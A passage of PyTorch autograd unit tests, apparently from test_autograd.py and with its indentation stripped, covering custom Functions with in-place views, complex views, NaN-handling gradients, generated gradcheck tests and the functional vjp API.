res.select(0, ctx.idx).copy_(grad)
return res, None
a = torch.ones(2, requires_grad=True)
idx = 1
bw_called[0] = 0
out = ComplexView.apply(a.clone(), idx)
out.sum().backward()
self.assertTrue(bw_called[0] == 1)
out = ComplexView.apply(a.clone(), idx)
with self.assertRaisesRegex(RuntimeError,
"Output 0 of ComplexViewBackward is a view and is being modified inplace"):
out += 1
def test_autograd_inplace_views_python(self):
# This is not necessarily the absolute correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change in these test will be BC-breaking and should be done carefully.
# This test checks custom autograd.Function that perform inplace operations
bw_called = [0]
# I) Single output
class MyAdder(Function):
@staticmethod
def forward(ctx, a, b):
a.add_(b)
ctx.mark_dirty(a)
return a
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
return grad, grad
a = torch.ones(2, requires_grad=True)
b = torch.ones(2, requires_grad=True)
# No extra inplace
c = MyAdder.apply(a.clone(), b)
c.sum().backward()
self.assertTrue(bw_called[0] == 1)
# With extra inplace on the output
bw_called[0] = 0
c = MyAdder.apply(a.clone(), b)
c += 2
c.sum().backward()
self.assertTrue(bw_called[0] == 1)
# The input is a view
bw_called[0] = 0
c = MyAdder.apply(a.clone().view_as(a), b)
c.sum().backward()
self.assertTrue(bw_called[0] == 1)
# Should not give non-inputs to mark_dirty
class MyAdderBad(Function):
@staticmethod
def forward(ctx, a, b):
c = 3 * a
c.add_(b)
ctx.mark_dirty(c)
return c
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
grad = 3 * grad
return grad, grad
a = torch.ones(2, requires_grad=True)
b = torch.ones(2, requires_grad=True)
with warnings.catch_warnings(record=True) as w:
MyAdderBad.apply(a.clone(), b)
self.assertEqual(len(w), 1)
# II) Multiple outputs
class MyBadAdder(Function):
@staticmethod
def forward(ctx, a, b):
a.add_(b)
ctx.mark_dirty(a)
return a, a + b
@staticmethod
def backward(ctx, ga, gab):
bw_called[0] += 1
return ga + gab, ga + gab
# No extra inplace
bw_called[0] = 0
c, d = MyBadAdder.apply(a.clone(), b)
(c * d).sum().backward()
self.assertTrue(bw_called[0] == 1)
# With extra inplace on the output
bw_called[0] = 0
c, d = MyBadAdder.apply(a.clone(), b)
c += 2
(c * d).sum().backward()
self.assertTrue(bw_called[0] == 1)
# The input is a view
inplace_on_view_err = "your Function modifies inplace an input that is a view of another Tensor"
with self.assertRaisesRegex(RuntimeError, inplace_on_view_err):
c, d = MyBadAdder.apply(a.clone().view_as(a), b)
# III) Inplace + other op
class MyOutPlaceAdder(Function):
@staticmethod
def forward(ctx, a, b):
a.add_(b)
ctx.mark_dirty(a)
return a.clone(), a + b
@staticmethod
def backward(ctx, ga, gab):
bw_called[0] += 1
return ga + gab, ga + 2 * gab
# We don't reuse the input
def fn(a, b):
orig_a = a.clone().view_as(a)
c, d = MyOutPlaceAdder.apply(orig_a, b)
return (c * d).sum()
bad_mark_dirty_err = "Some elements marked as dirty during the forward method were not returned as output."
with self.assertRaisesRegex(RuntimeError, bad_mark_dirty_err):
fn(a, b)
def test_named_tensor_for_complex_views(self):
names = ["batch", "height", "width", "complex"]
z = torch.ones((5, 12, 14, 2), requires_grad=True)
z_named = z.refine_names(*names)
z_complex = torch.view_as_complex(z_named.rename(None)).refine_names(*names[:-1])
z_complex.sum().backward()
self.assertEqual(z.grad, torch.view_as_real(torch.ones_like(z_complex).rename(None)))
def test_custom_function_return_view_in_nograd(self):
class Alias(Function):
@staticmethod
def forward(ctx, x):
return x[:]
@staticmethod
def backward(ctx, gx):
return gx
inp = torch.rand(2, requires_grad=True)
with torch.no_grad():
output = Alias.apply(inp)
with torch.no_grad():
expected_output = inp[:]
# Calling the custom function should operate as if we called an equivalent op
self.assertEqual(output.requires_grad, expected_output.requires_grad)
# Check that in-place modification on view throws
leaf_grad_err = "A view was created in no_grad mode and is being modified inplace"
with self.assertRaisesRegex(RuntimeError, leaf_grad_err):
output.zero_()
def test_grad_mode_restored_reentrant(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, inp):
return inp.clone()
@staticmethod
def backward(ctx, go):
original = torch._C.is_grad_enabled()
with torch.enable_grad():
self.assertTrue(torch._C.is_grad_enabled())
foo = torch.rand(go.size(), requires_grad=True)
grad, = torch.autograd.grad(
foo ** 3, foo, grad_outputs=go
)
self.assertTrue(torch._C.is_grad_enabled())
self.assertTrue(torch._C.is_grad_enabled() == original)
return grad
inp = torch.rand(3, requires_grad=True)
# Case where original==False
MyFunction.apply(inp).sum().backward()
# Case where original==True
MyFunction.apply(inp).sum().backward(create_graph=True)
def test_power_function(self):
a = torch.tensor([0., 0., 0.])
b = torch.tensor([-1., 0., 1.], requires_grad=True)
c = torch.sum(a**b)
c.backward()
self.assertEqual(b.grad, torch.tensor([-inf, 0., 0.]))
s = 0
b = torch.tensor([-1., 0., 1.], requires_grad=True)
c = torch.sum(s**b)
c.backward()
self.assertEqual(b.grad, torch.tensor([-inf, 0., 0.]))
def test_nansum_with_nans(self):
a = torch.randn(2, 2, 2, 2, dtype=torch.double)
with torch.no_grad():
a[a < 0.2] = float('nan')
a.requires_grad = True
# No args
gradcheck(lambda x: x.nansum(), a)
gradgradcheck(lambda x: x.nansum(), a)
# Single dim
gradcheck(lambda x: x.nansum((0)), a)
gradgradcheck(lambda x: x.nansum((0)), a)
# Multi dim
gradcheck(lambda x: x.nansum((0, 2)), a)
gradgradcheck(lambda x: x.nansum((0, 2)), a)
gradcheck(lambda x: x.nansum((0, -1)), a)
gradgradcheck(lambda x: x.nansum((0, -1)), a)
# With keep-dim
gradcheck(lambda x: x.nansum((0, -1), True), a)
gradgradcheck(lambda x: x.nansum((0, -1), True), a)
def test_nansum_dtype(self):
inp = torch.randn(2, 2, 2, 2)
with torch.no_grad():
inp[inp < 0.2] = float('nan')
def test(inp, inp_dtype, out_dtype):
with torch.no_grad():
a = inp.to(inp_dtype)
a.requires_grad = True
b = torch.sum(a, dtype=out_dtype)
b.backward()
self.assertEqual(a.dtype, a.grad.dtype)
test(inp, torch.float, torch.double)
test(inp, torch.double, torch.float)
def test_nan_to_num(self):
a = torch.randn(3, 3, 3, 3, dtype=torch.double)
with torch.no_grad():
a[torch.rand_like(a) < 0.2] = float('nan')
a[torch.rand_like(a) < 0.2] = float('inf')
a[torch.rand_like(a) < 0.2] = -float('inf')
a.requires_grad = True
gradcheck(lambda x: x.nan_to_num(), a)
gradgradcheck(lambda x: x.nan_to_num(), a)
gradcheck(lambda x: x.nan_to_num(nan=1.2), a)
gradgradcheck(lambda x: x.nan_to_num(nan=1.2), a)
gradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0), a)
gradgradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0), a)
gradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0, neginf=-2.0), a)
gradgradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0, neginf=-2.0), a)
gradcheck(lambda x: x.nan_to_num(posinf=2.0, neginf=-2.0), a)
gradgradcheck(lambda x: x.nan_to_num(posinf=2.0, neginf=-2.0), a)
gradcheck(lambda x: x.nan_to_num(neginf=-2.0), a)
gradgradcheck(lambda x: x.nan_to_num(neginf=-2.0), a)
def test_custom_function_error(self):
class BadFw(Function):
@staticmethod
def backward(ctx, foo):
return foo
class BadBw(Function):
@staticmethod
def forward(ctx, foo):
return foo.clone()
inp = torch.rand(1, requires_grad=True)
with self.assertRaisesRegex(NotImplementedError, "must implement the forward"):
BadFw.apply(inp)
with self.assertRaisesRegex(RuntimeError, "must implement the backward"):
BadBw.apply(inp).sum().backward()
def test_custom_function_local_inplace(self):
class MyFn(torch.autograd.Function):
@staticmethod
def forward(ctx, inp, inplace):
view = inp.clone()[:3]
if inplace:
view += 2
return view
@staticmethod
def backward(ctx, grad):
return grad, None
base = torch.rand(10, requires_grad=True)
foo = MyFn.apply(base, False)
self.assertEqual(foo.grad_fn.__class__.__name__, "MyFnBackward")
foo = MyFn.apply(base, True)
self.assertEqual(foo.grad_fn.__class__.__name__, "MyFnBackward")
def test_integer_outputs(self):
inp = torch.rand(4, requires_grad=True)
out = inp.argmax()
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
out = inp.argmin()
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
out = inp.argsort()
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
val = torch.rand((), requires_grad=True)
out = torch.searchsorted(inp, val)
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
bins = torch.linspace(0, 1.0, steps=100, requires_grad=True)
vals = torch.rand(5, 5, requires_grad=True)
out = torch.bucketize(vals, bins)
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
val = torch.empty(5).requires_grad_()
out = val.count_nonzero()
self.assertFalse(out.requires_grad)
def assert_only_first_requires_grad(res):
if not isinstance(res, tuple):
res = (res,)
self.assertTrue(res[0].requires_grad)
for out in res[1:]:
if out is not None:
self.assertFalse(out.requires_grad)
for sort in [True, False]:
for return_inverse in [True, False]:
for return_counts in [True, False]:
res = torch.unique(inp, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
res = torch.unique(inp, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts, dim=0)
assert_only_first_requires_grad(res)
res = torch.unique_consecutive(inp, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
res = torch.unique_consecutive(inp, return_inverse=return_inverse,
return_counts=return_counts, dim=0)
assert_only_first_requires_grad(res)
# Here we test the internal functions to make sure all of them are
# covered on top of the public API
res = torch._unique(inp, sorted=sort, return_inverse=return_inverse)
assert_only_first_requires_grad(res)
# This looks public but is actually manually deleted from the
# torch namespace in torch/functional.py
res = torch._VF.unique_dim(inp, dim=0, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
# We don't test `unique_dim_consecutive` here.
# It looks public but the python binding is actually manually disabled in
# tools/autograd/gen_python_functions.py
res = torch._unique2(inp, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
def index_perm_variable(shape, max_indices):
if not isinstance(shape, tuple):
shape = (shape,)
index = torch.randperm(max_indices).narrow(0, 0, reduce(mul, shape)).view(shape)
return index
def bernoulli_scalar():
return torch.tensor(0, dtype=torch.uint8).bernoulli_()
def gradgradcheck_method_precision_override(test_name):
# these are just empirical observations, we should improve
gradgradcheck_precision_override = {
'test_norm': {'atol': 2e-2, 'rtol': 1e-2},
'test_norm_1_5': {'atol': 1.5e-2, 'rtol': 1e-2},
'test_norm_3': {'atol': 5e-2, 'rtol': 1e-2},
'test_dist': {'atol': 5e-2, 'rtol': 1e-2},
'test_dist_4': {'atol': 8e-2, 'rtol': 1e-2},
}
non_broadcasted_test_name = test_name.split("_broadcast")[0]
override = gradgradcheck_precision_override.get(non_broadcasted_test_name)
if override:
if 'broadcast_lhs' in test_name or 'broadcast_rhs' in test_name:
# errors accumulated across 1 dimension
override = {'atol': override['atol'] * S, 'rtol': override['atol'] * S}
elif 'broadcast_all' in test_name:
# errors accumulated across multiple dimensions
override = {'atol': override['atol'] * S * S, 'rtol': override['atol'] * S * S}
return override
def run_grad_and_gradgrad_checks(test_case, name, test_name, apply_method, output_variable,
input_variables, run_gradgradcheck=True, check_batched_grad=True):
test_case.assertTrue(gradcheck(apply_method, input_variables, eps=1e-6, atol=PRECISION,
check_batched_grad=check_batched_grad))
if name in EXCLUDE_GRADGRADCHECK or test_name in EXCLUDE_GRADGRADCHECK_BY_TEST_NAME:
return
gradgradcheck_precision_override = gradgradcheck_method_precision_override(test_name)
if gradgradcheck_precision_override is not None:
atol = gradgradcheck_precision_override['atol']
rtol = gradgradcheck_precision_override['rtol']
test_case.assertTrue(gradgradcheck(apply_method, input_variables, None, atol=atol, rtol=rtol,
gen_non_contig_grad_outputs=True,
check_batched_grad=check_batched_grad))
else:
test_case.assertTrue(gradgradcheck(apply_method, input_variables,
gen_non_contig_grad_outputs=True,
check_batched_grad=check_batched_grad))
def run_functional_checks(test_case, test_name, name, apply_fn, run_grad_checks,
f_args_variable, f_args_tensor):
output_variable = apply_fn(*f_args_variable)
if run_grad_checks:
run_grad_and_gradgrad_checks(test_case, name, test_name, apply_fn,
output_variable, f_args_variable)
self_variable = f_args_variable[0]
if isinstance(output_variable, torch.Tensor) and output_variable.requires_grad and self_variable is not None:
output_variable.backward(randn_like(output_variable))
test_case.assertEqualTypeString(self_variable, self_variable.grad)
test_case.assertEqual(self_variable.size(), self_variable.grad.size())
# this list corresponds to ops which have separate tests defined for complex dtypes in
# common_methods_invocations.py
# test for these ops with 'complex' in variant should only run for complex and
# the tests for these ops which do not have 'complex' in variant should not run for complex
# and only run for floating point
separate_complex_tests = ['div', '__rdiv__', 'sub']
# allow list for complex
complex_list = ['t', 'view', 'reshape', 'reshape_as', 'view_as', 'roll', 'clone',
'expand', 'rot90', 'transpose',
'permute', 'squeeze', 'unsqueeze', 'resize', 'resize_as', 'tril', 'triu',
'chunk', 'split', 'split_with_sizes', 'zero_',
'__radd__', 'mul', '__rmul__', 'diagonal', 'fill_', 'sub', 'narrow',
'swapaxes', 'swapdims', 'tensor_split'] + separate_complex_tests
# deny list for batched grad computation
EXCLUDE_BATCHED_GRAD_TESTS = set([
'test_to_sparse',
])
def add_test(
name,
self_size,
args,
variant_name='',
check_ad=(), # only used in test_jit
dim_args_idx=(),
skipTestIf=(),
output_process_fn=lambda x: x,
kwargs=None):
kwargs = kwargs if kwargs else {}
basic_test_name = 'test_' + name
if variant_name != '':
basic_test_name += '_' + variant_name
if name in separate_complex_tests and 'complex' in variant_name:
run_only_complex = True
else:
run_only_complex = False
for dtype in [torch.double, torch.cdouble]:
for dim_perm in product([-1, 1], repeat=len(dim_args_idx)):
test_name = basic_test_name
new_args = [arg * dim_perm[dim_args_idx.index(i)] if i in dim_args_idx else arg for i, arg in enumerate(args)]
test_name = basic_test_name + ''.join('_neg' + str(i) for i, idx in enumerate(dim_perm) if idx < 0)
if dtype.is_complex:
# TODO: remove this. this is temporary while we ramp up the complex support.
if name in complex_list:
if name in separate_complex_tests and 'complex' not in variant_name:
continue
if not run_only_complex:
test_name = test_name + '_complex'
else:
continue
elif run_only_complex:
continue
new_args = tuple(new_args)
# for-loop bodies don't define scopes, so we have to save the variables
# we want to close over in some way
def do_test(self, device, dtype=dtype, name=name, self_size=self_size, args=new_args, test_name=test_name,
output_process_fn=output_process_fn):
def check(name):
is_magic_method = name[:2] == '__' and name[-2:] == '__'
is_inplace = name[-1] == "_" and not is_magic_method
self_variable = create_input((self_size,), dtype=dtype, device=device)[0][0]
# FixMe: run grad checks on inplace self
if is_inplace:
self_variable.requires_grad = False
# need to record this because methods can change the size (e.g. unsqueeze)
args_variable, kwargs_variable = create_input(args, requires_grad=not is_inplace,
call_kwargs=kwargs, dtype=dtype, device=device)
self_tensor = deepcopy(self_variable)
args_tensor = deepcopy(unpack_variables(args_variable))
if not exclude_tensor_method(name, test_name):
output_variable = getattr(self_variable, name)(*args_variable, **kwargs_variable)
output_tensor = getattr(self_tensor, name)(*args_tensor, **kwargs_variable)
if not isinstance(output_tensor, torch.Tensor) and not isinstance(output_tensor, tuple):
if dtype.is_complex:
output_tensor = torch.tensor((output_tensor, ), dtype=torch.cfloat, device=device)
else:
output_tensor = torch.tensor((output_tensor, ), dtype=torch.float, device=device)
self.assertEqual(unpack_variables(output_variable), output_tensor)
# TODO: check that both have changed after adding all inplace ops
def fn(*inputs):
output = getattr(inputs[0], name)(*inputs[1:], **kwargs)
return output_process_fn(output)
if not is_inplace and name not in EXCLUDE_GRADCHECK:
check_batched_grad = test_name not in EXCLUDE_BATCHED_GRAD_TESTS
run_grad_and_gradgrad_checks(self, name, test_name, fn,
output_variable, (self_variable,) + args_variable,
check_batched_grad=check_batched_grad)
# functional interface tests
torch_fn = getattr_qualified(torch, name)
if torch_fn is not None and name not in EXCLUDE_FUNCTIONAL:
def fn(*inputs):
output = torch_fn(*inputs, **kwargs)
return output_process_fn(output)
f_args_variable = (self_variable,) + args_variable
f_args_tensor = (self_tensor,) + args_tensor
# could run the gradchecks again, but skip since we did it for the methods above.
run_gradcheck = exclude_tensor_method(name, test_name) and not is_inplace and name not in EXCLUDE_GRADCHECK
run_functional_checks(self, test_name, name, fn,
run_gradcheck, f_args_variable, f_args_tensor)
# check for correct type of input and input.grad
if not is_inplace:
self_variable = create_input((self_size,), requires_grad=True, dtype=dtype)[0][0]
args_variable, kwargs_variable = create_input(args, requires_grad=False, call_kwargs=kwargs, dtype=dtype)
if hasattr(self_variable, name):
attribute_result = getattr(self_variable, name)
if callable(attribute_result):
output_variable = attribute_result(*args_variable, **kwargs_variable)
else:
self.assertTrue(len(args_variable) == 0)
self.assertTrue(len(kwargs_variable) == 0)
output_variable = attribute_result
else:
self_and_args_variable = (self_variable,) + args_variable
output_variable = torch_fn(*self_and_args_variable, **kwargs_variable)
if isinstance(output_variable, torch.autograd.Variable):
if output_variable.is_sparse:
rand = randn_like(output_variable.to_dense()).to_sparse()
else:
rand = randn_like(output_variable)
output_variable.backward(rand)
self.assertTrue(type(self_variable) == type(self_variable.grad))
self.assertTrue(self_variable.size() == self_variable.grad.size())
# compare grads to inplace grads
inplace_name = name + '_'
# can't broadcast inplace to left hand side
skip_inplace = ('broadcast_lhs' in test_name or
'broadcast_all' in test_name)
if hasattr(torch.ones(1), inplace_name) and not skip_inplace:
output_variable = getattr(self_variable, name)(*args_variable, **kwargs_variable)
if not isinstance(output_variable, tuple):
output_variable = (output_variable,)
inplace_self_variable = deepcopy(self_variable)
inplace_self_variable_copy = tuple(i.clone() if isinstance(i, torch.Tensor) else i
for i in (inplace_self_variable,))
inplace_args_variable = deepcopy(args_variable)
inplace_args_variable_copy = tuple(i.clone() if isinstance(i, torch.Tensor) else i
for i in inplace_args_variable)
inplace_output_variable = (
getattr(inplace_self_variable_copy[0], inplace_name)(*inplace_args_variable_copy,
**kwargs_variable))
if not isinstance(inplace_output_variable, tuple):
inplace_output_variable = (inplace_output_variable,)
self.assertEqual(inplace_output_variable, output_variable)
# Check that gradient is the same
for inp_i, i in zip((inplace_self_variable,) + inplace_args_variable,
(self_variable,) + args_variable):
if not isinstance(inp_i, torch.Tensor):
assert not isinstance(i, torch.Tensor)
continue
if inp_i.grad is not None:
with torch.no_grad():
inp_i.grad.zero_()
if i.grad is not None:
with torch.no_grad():
i.grad.zero_()
for i_o, o in zip(inplace_output_variable, output_variable):
if dtype.is_complex:
grad = randn_like(i_o).to(torch.cdouble)
else:
grad = randn_like(i_o).double()
i_o.backward(grad)
o.backward(grad)
for inp_i, i in zip((inplace_self_variable,) + inplace_args_variable,
(self_variable,) + args_variable):
if not isinstance(inp_i, torch.Tensor):
continue
self.assertEqual(inp_i.grad, i.grad)
check(name)
inplace_name = name + '_'
# can't broadcast inplace to left hand side
broadcast_skip_inplace = 'broadcast_lhs' in test_name or 'broadcast_all' in test_name
if hasattr(torch.ones(1), inplace_name) and not broadcast_skip_inplace:
check(inplace_name)
assert not hasattr(TestAutograd, test_name), 'Two tests have the same name: ' + test_name
for skip in skipTestIf:
do_test = skip(do_test)
setattr(TestAutogradDeviceType, test_name, do_test)
class TestAutogradComplex(TestCase):
def test_view_func_for_complex_views(self):
# case 1: both parent and child have view_func
x = torch.randn(2, 2, 2, dtype=torch.double, requires_grad=True)
y = x.detach().requires_grad_(True)
x0 = x.clone()
x1 = torch.view_as_complex(x0)
x2 = torch.view_as_real(x1)
x2.mul_(2)
x2.sum().backward()
y0 = y.clone()
y0.mul_(2)
y0.sum().backward()
self.assertEqual(x.grad, y.grad)
# case 2: parent has view_func but child does not
x = torch.randn(2, 2, 2, dtype=torch.double, requires_grad=True)
y = x.detach().requires_grad_(True)
def fn(a):
b = a.clone()
b1 = torch.view_as_complex(b)
b2 = b1.reshape(b1.numel())
return b2
x0 = fn(x)
x0.mul_(2)
x0.sum().backward()
y0 = fn(y)
y1 = y0.mul(2)
y1.sum().backward()
self.assertEqual(x.grad, y.grad)
# case 3: parent does not have a view_func but child does
x = torch.randn(10, dtype=torch.cdouble, requires_grad=True)
y = x.detach().requires_grad_(True)
def fn(a, dim0_size=5):
b = a.clone()
b1 = b.reshape(dim0_size, 2)
b2 = torch.view_as_real(b1)
return b2
x0 = fn(x)
x0.mul_(2)
x0.sum().backward()
y0 = fn(y)
y1 = y0.mul(2)
y1.sum().backward()
self.assertEqual(x.grad, y.grad)
def test_view_with_multi_output(self):
x = torch.randn(2, 2, 2, dtype=torch.double)
x1 = torch.view_as_complex(x)
# Taking an invalid view should always be allowed as long as it is not
# modified inplace
res = x1.unbind(0)
with self.assertRaisesRegex(RuntimeError, "output of a function that returns multiple views"):
res[0] += torch.rand(2, requires_grad=True)
x.requires_grad_(True)
x1 = torch.view_as_complex(x)
# Taking an invalid view should always be allowed as long as it is not
# modified inplace
res = x1.unbind(0)
with self.assertRaisesRegex(RuntimeError, "output of a function that returns multiple views"):
res[0] += torch.rand(2, requires_grad=True)
def as_identity(self):
# view_as_real and view_as_complex behavior should be like an identity
def func(z):
z_ = torch.view_as_complex(z)
z_select = torch.select(z_, z_.dim() - 1, 0)
z_select_real = torch.view_as_real(z_select)
return z_select_real.sum()
z = torch.randn(10, 2, 2, dtype=torch.double, requires_grad=True)
gradcheck(func, [z])
func(z).backward()
z1 = z.clone().detach().requires_grad_(True)
torch.select(z1, z1.dim() - 2, 0).sum().backward()
self.assertEqual(z.grad, z1.grad)
class TestAutogradFunctional(TestCase):
def _assert_same_struct(self, res, base):
# base and res should be Tensors or tuple of Tensors with the same size
if isinstance(base, torch.Tensor):
self.assertTrue(isinstance(res, torch.Tensor))
self.assertEqual(base.size(), res.size())
elif isinstance(base, tuple):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(base), len(res))
for el_base, el_res in zip(base, res):
self.assertTrue(isinstance(el_base, torch.Tensor))
self.assertTrue(isinstance(el_res, torch.Tensor))
self.assertEqual(el_base.size(), el_res.size())
else:
# Wrong base
raise RuntimeError("The base given to `_assert_same_struct` doesn't have"
" the right structure.")
def _assert_interleaved_struct(self, res, base1, base2):
# base1 and base2 can be Tensors or tuples of Tensors.
# If they are tuples, res should be a tuple as well.
# The indexing works as follows for base1, base2 being
# - tuple, tuple: res[i][j][k][l] = (base1[i][k], base2[j][l])
# - tuple, Tensor: res[i][k][l] = (base1[i][k], base2[l])
# - Tensor, tuple: res[i][j][l] = (base1[i], base2[j][l])
# - Tensor, Tensor: res[k][l] = (base1[k], base2[l])
if isinstance(base1, torch.Tensor) and isinstance(base2, torch.Tensor):
self.assertTrue(isinstance(res, torch.Tensor))
self.assertEqual(res.size(), base1.size() + base2.size())
elif isinstance(base1, tuple) and isinstance(base2, torch.Tensor):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(res), len(base1))
for el_res, el_base1 in zip(res, base1):
self.assertTrue(isinstance(el_res, torch.Tensor))
self.assertTrue(isinstance(el_base1, torch.Tensor))
self.assertEqual(el_res.size(), el_base1.size() + base2.size())
elif isinstance(base1, torch.Tensor) and isinstance(base2, tuple):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(res), len(base2))
for el_res, el_base2 in zip(res, base2):
self.assertTrue(isinstance(el_res, torch.Tensor))
self.assertTrue(isinstance(el_base2, torch.Tensor))
self.assertEqual(el_res.size(), base1.size() + el_base2.size())
elif isinstance(base1, tuple) and isinstance(base2, tuple):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(res), len(base1))
for el_res, el_base1 in zip(res, base1):
self.assertTrue(isinstance(el_res, tuple))
self.assertEqual(len(res), len(base2))
for el_el_res, el_base2 in zip(el_res, base2):
self.assertTrue(isinstance(el_el_res, torch.Tensor))
self.assertTrue(isinstance(el_base2, torch.Tensor))
self.assertEqual(el_el_res.size(), el_base1.size() + el_base2.size())
else:
# Wrong bases
raise RuntimeError("The bases given to `_assert_interleaved_struct` don't have"
" the right structure.")
def test_vjp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3)
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
inp = torch.rand(4)
v = torch.ones(3)
with self.assertRaisesRegex(TypeError, "The inputs given to vjp must be either a Tensor"):
res = autogradF.vjp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to vjp must"):
res = autogradF.vjp(bar, inp, v)
with self.assertRaisesRegex(RuntimeError, "The vector v can only be None if the user-provided function returns"):
res = autogradF.vjp(foo, inp)
with self.assertRaisesRegex(RuntimeError, "The given v should contain a single Tensor."):
res = autogradF.vjp(foo, inp, (torch.ones_like(inp), torch.ones_like(inp)))
with self.assertRaisesRegex(RuntimeError, "v has invalid size: should be torch.Size"):
res = autogradF.vjp(foo, inp, v[:2])
res = autogradF.vjp(foo, inp, v)[1]
self._assert_same_struct(res, inp)
def test_vjp_err_check_strict(self):
def foo(a):
return a.detach()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.vjp(foo, inp, v, strict=True)
res = autogradF.vjp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.vjp(bar, inp, v, strict=True)
res = autogradF.vjp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
# The Jacobian does not depend on the input
def foo(a):
return a.clone()
inp.requires_grad_()
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
res = autogradF.vjp(foo, inp, v, create_graph=True, strict=True)
res = autogradF.vjp(foo, inp, v, create_graph=True, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1], v)
def test_vjp_no_grad(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4)
with torch.no_grad():
res = autogradF.vjp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
inputs.requires_grad_()
v.requires_grad_()
with torch.no_grad():
res = autogradF.vjp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_vjp_output(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4)
res = autogradF.vjp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y
inputs = (torch.rand(2), torch.rand(2))
v = torch.ones(2)
out, vjp_val = autogradF.vjp(adder, inputs, v)
self._assert_same_struct(vjp_val, inputs)
self.assertIsNone(out.grad_fn)
self.assertIsNone(vjp_val[0].grad_fn)
self.assertIsNone(vjp_val[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y, x + y
inputs = (torch.rand(2), torch.rand(2))
v = (torch.tensor([1., 0.]), torch.tensor([1., 0.]))
out, vjp_val = autogradF.vjp(adder, inputs, v)
self._assert_same_struct(vjp_val, inputs)
self.assertIsNone(out[0].grad_fn)
self.assertIsNone(out[1].grad_fn)
self.assertIsNone(vjp_val[0].grad_fn)
self.assertIsNone(vjp_val[1].grad_fn)
def test_vjp_scalar(self):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
v = torch.ones([])
res = autogradF.vjp(reducer, inputs, v)
self._assert_same_struct(res[0], v)
self._assert_same_struct(res[1], inputs)
res = autogradF.vjp(reducer, inputs)
self._assert_same_struct(res[0], v)
self._assert_same_struct(res[1], inputs)
def expander(x):
return x.unsqueeze(0).repeat(4)
inputs = torch.rand([])
v = torch.ones(4)
res = autogradF.vjp(expander, inputs, v)
self._assert_same_struct(res[0], v)
self._assert_same_struct(res[1], inputs)
def test_vjp_create_graph(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(2, 2, dtype=torch.double)
v = torch.ones(2, dtype=torch.double)
inputs.requires_grad_()
v.requires_grad_()
res = autogradF.vjp(reducer, inputs, v, create_graph=True)
self._assert_same_struct(res[1], inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.vjp(reducer, inputs, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.vjp(reducer, inputs, v, create_graph=True), (inputs, v))
def adder(x, y):
return 2 * x + 3 * y, x * y
inputs = (torch.rand(2, dtype=torch.double, requires_grad=True),
torch.rand(2, dtype=torch.double, requires_grad=True))
v = (torch.tensor([1., 0.], dtype=torch.double, requires_grad=True),
torch.tensor([1., 0.], dtype=torch.double, requires_grad=True))
gradcheck(lambda *args: autogradF.vjp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.vjp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.vjp(adder, (x, y), v, create_graph=True)
return val[0].exp() + val[1].exp() + grad[0].exp() + grad[1].exp() + x.exp() + y.exp()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def test_jvp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3)
def bar(a):
